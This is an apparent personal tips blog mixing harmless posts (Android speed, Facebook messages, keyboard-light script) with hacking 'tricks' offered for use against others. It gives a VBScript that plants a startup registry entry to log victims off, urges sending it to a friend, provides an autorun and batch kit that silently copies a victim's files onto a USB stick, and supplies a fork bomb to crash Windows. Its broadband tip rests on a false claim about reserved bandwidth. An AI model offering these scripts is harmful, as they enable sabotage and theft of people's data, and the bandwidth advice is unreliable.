This blog is officialy managed by Shahnawaz Alam. You can get here amazing collections of information which you have never ever seen, heard and experienced before

Friday, 15 May 2015

May 16, 2015 at 08:30AM

20:07 Posted by Unknown No comments
Make your Android fast again — it is possible We've all been there. You have a fancy, new, highly complex Android-powered computational device that can do everything from checking your email to surfing the web to controlling your microwave so your popcorn doesn't burn. It's shiny, and screaming fast while doing all the things we wanted it to do. Everything is roses all around. Android Central BasicsFast forward a year down the road, and besides the shiny wearing off, things aren't as zippy as they used to be. Apps take longer to open and run. Transitions between screens take longer to redraw than we would like. The speed demon that your device once was is starting to get a little frustrating to use. Your Android is slow. Don't fret. This happens to every computer, even the Android one you carry in your pocket. The good news is that there are a few things you can do to alleviate your pain and get back to Speed Racer mode again. None are difficult, and we're going to take a look at the five best things you can do to "fix" a slow Android. #FasterAndi
http://ift.tt/1JMhCVg

Thursday, 14 May 2015

May 15, 2015 at 10:25AM

21:56 Posted by Unknown No comments
#FbSecrets Check your 'Other' messages Just as Facebook highlights stories in your news feed that it thinks are of greater importance to you, it also sorts your messages. The main Messages folder contains messages from your friends and their friends. All other messages will go into an 'Other' folder where you can look at them separately. This Other folder isn't visible until you view your main Messages folder, and Facebook doesn't send you a notification when a new message arrives in this folder. You might therefore have hundreds of unread messages that Facebook has filed in your Other inbox.
http://ift.tt/1JMhCVg

Friday, 14 February 2014

VIRUS THAT SHUTDOWN THE PC AT EVERY STARTUP

00:18 Posted by Unknown , No comments
Hello Friends,
Today i am going to share something disasterous

This post of virus programming will tell you about... how you can make a virus that will shutdown a PC Automatically at Startup. Every time when a victim will restart his PC, it will be shutdown.

Ok, just open the notepad and type or paste the following code:

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now save this notepad file with any name having ".vbs" extension E.g., Shahnawaz's fork bomb.vbs

Now send it to ur friend.... and Frustrate your friend by shutting down his computer automatically on startup

How to get rid of this virus:
for that just boot ur system in safe mode and then go to directory c:\ windows.... find out wscript.vbs file there.... and delete it

COPY DATA FROM SOMEONE'S USB WITHOUT INFORMING HIM

00:12 Posted by Unknown , No comments
This trick will enable you to copy data from anyone's USB without any notifications or without informaing him. Here is a Trick which can help you to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

To use this Trick just follow these simple Steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or

Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.

Wednesday, 8 May 2013

INCREASE YOUR BROADBAND SPEED

03:46 Posted by Unknown , No comments
                       Increase Your Broadband Speed!!

This is a way To Increase your Broad band speed in windows enabled system .
I guarantee this will increase your speed up to 20% :-)

So How is this working ?, Windows and its services already reserved a quota of 20% of the total

bandwidth for their update futures.

So as default this is recommended as 20.. so just change it to 0 thats all..
a step by step proces will given below how to do this ..

Go to Run and type GPEDIT.MSC so You have a window of Group policy like in the pic...

Go to Administrative templates ->>>> Network>>>>>>QoS packet scheduler

and In the "limit Reservable Bandwidth "

By Default it is Shown As Not configured Change Them To Enable And put The Value TO "0"

MAKE YOUR KEYBOARD LIGHTS ACT AS A DISCO LIGHT

03:39 Posted by Unknown , , No comments
You can make your keyboard lights as a disco lights by the following steps:

1.Open notepad.You can open notepad by doing a right click on your desktop and then new->text document.

2.Copy and paste the code below into the notepad

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"
 loop

3.Save the file with name disco.vbs

4.Double click on the saved file and your keyboard Led’s will start blinking like disco lights.

5.To stop the disco lights open task manager.You can open task manager by doing a right click on your taskbar and then selecting task manager.

 6.Now locate wscript.exe and select it.Click on “ End Process “.

CRASH A SYSTEM

03:36 Posted by Unknown , , No comments
Here is a short article about fork bomb by Shahnawaz Alam.
Fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters. Fork bombs count as wabbits: they typically do not spread as worms or viruses.

The concept behind the fork bomb: the processes recursively fork until a denial of service or a crash occurs. Fork Bomb creates a large number of processes very quickly and break the limitation of processes that can run on a system. It's dead simple: A program just replicate itself, which again replicate itself and so on until all resources are exhausted.


A fork bomb generally creates two instances at startup, further each of created processes creates two instances and so on…The processes recursively fork; this “forks” the processor and jamm it completely until a crash occurs. It use forks to do system crash, so its called Fork Bomb

See, How to create it:


1. Fork Bomb for windows:
Write the following code in notepad and save it with *.bat* extension say Shahnawaz.bat

%0|%0

Once anyone will do double click on this bat file, his system will jamm.